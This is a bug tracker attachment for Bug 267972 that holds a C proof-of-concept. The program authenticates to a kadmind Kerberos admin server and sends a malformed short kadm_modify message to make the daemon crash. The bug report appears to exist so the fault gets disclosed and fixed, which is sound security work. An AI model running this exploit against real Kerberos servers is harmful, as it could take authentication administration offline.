Attachment 238312 Details for Bug 267972 – crash kadmind with a short kadm_modify message

crash kadmind with a short kadm_modify message

kadmind16a.c (text/plain), 3.09 KB, created by Robert Morris on 2022-11-24 18:29:58 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Robert Morris

Created: 2022-11-24 18:29:58 UTC

Size: 3.09 KB

patch

obsolete

>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <sys/ioctl.h>
>#include <netinet/in.h>
>#include <sys/wait.h>
>#include <sys/resource.h>
>#include <arpa/inet.h>
>#include <assert.h>
>#include <ctype.h>
>#include <fcntl.h>
>#include <signal.h>
>#include <krb5.h>
>
>unsigned long long aa[] = {
>0x85808080ull,
>0x0ull,
>0x0ull,
>0x8080808000000000ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x73840000ull,
>};
>int aai;
>
>int
>main(){
>  signal(SIGPIPE, SIG_IGN);
>
>  int status;
>
>  krb5_context context;
>  assert(krb5_init_context(&context) == 0);
>
>  struct sockaddr_in sin;
>  memset(&sin, 0, sizeof(sin));
>  sin.sin_family = AF_INET;
>  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
>  sin.sin_port = htons(749);
>
>  int s = socket(AF_INET, SOCK_STREAM, 0);
>  int ret = connect(s, (struct sockaddr *)&sin, sizeof(sin));
>  if(ret < 0){
>    perror("connect");
>    exit(1);
>  }
>
>  krb5_auth_context auth_context = NULL;
>  assert(krb5_auth_con_init(context, &auth_context) == 0);
>
>  assert(krb5_auth_con_setaddrs_from_fd(context, auth_context, &s) == 0);
>
>  krb5_principal server;
>  assert(krb5_sname_to_principal(context, "admin", "kadmin", KRB5_NT_SRV_HST, &server) == 0);
>
>  status = krb5_sendauth(context,
>                         &auth_context,
>                         &s,
>                         "KADM0.1",
>                         NULL,
>                         server,
>                         0,
>                         NULL,
>                         NULL,
>                         NULL,
>                         NULL,
>                         NULL,
>                         NULL);
>  if(status)
>    krb5_err(context, 1, status, "krb5_sendauth");
>
>  {
>    // send zero mask for params / realm
>    char buf[4];
>    memset(buf, 0, sizeof(buf));
>    krb5_data data;
>    data.data = buf;
>    data.length = sizeof(buf);
>    krb5_data packet;
>    krb5_data_zero(&packet);
>    status = krb5_mk_priv(context,
>                          auth_context,
>                          &data,
>                          &packet,
>                          NULL);
>    if(status)
>      krb5_err(context, 1, status, "krb5_mk_safe");
>    int len = packet.length;
>    int net_len = htonl(len);
>    if(krb5_net_write(context, &s, &net_len, 4) != 4){
>      perror("krb5_net_write");
>      exit(1);
>    }
>    if(krb5_net_write(context, &s, packet.data, len) != len){
>      perror("krb5_net_write");
>      exit(1);
>    }
>  }
>
>#define NN 61
>  char buf[NN+7];
>  memset(buf, 0x80, sizeof(buf));
>  for(int i = 0; i+8 <= sizeof(buf); i += 8)
>    *(long long *)(buf + i) ^= aa[aai++];
>  
>  krb5_data data;
>  data.data = buf;
>  data.length = NN;
>
>  krb5_data packet;
>  krb5_data_zero(&packet);
>
>  status = krb5_mk_priv(context,
>                        auth_context,
>                        &data,
>                        &packet,
>                        NULL);
>  if(status)
>    krb5_err(context, 1, status, "krb5_mk_safe");
>
>  int len = packet.length;
>  int net_len = htonl(len);
>  if(krb5_net_write(context, &s, &net_len, 4) != 4)
>    perror("krb5_net_write");
>  if(krb5_net_write(context, &s, packet.data, len) != len)
>    perror("krb5_net_write");
>
>  sleep(1);
>}

Actions: View

Attachments on bug 267972: 238312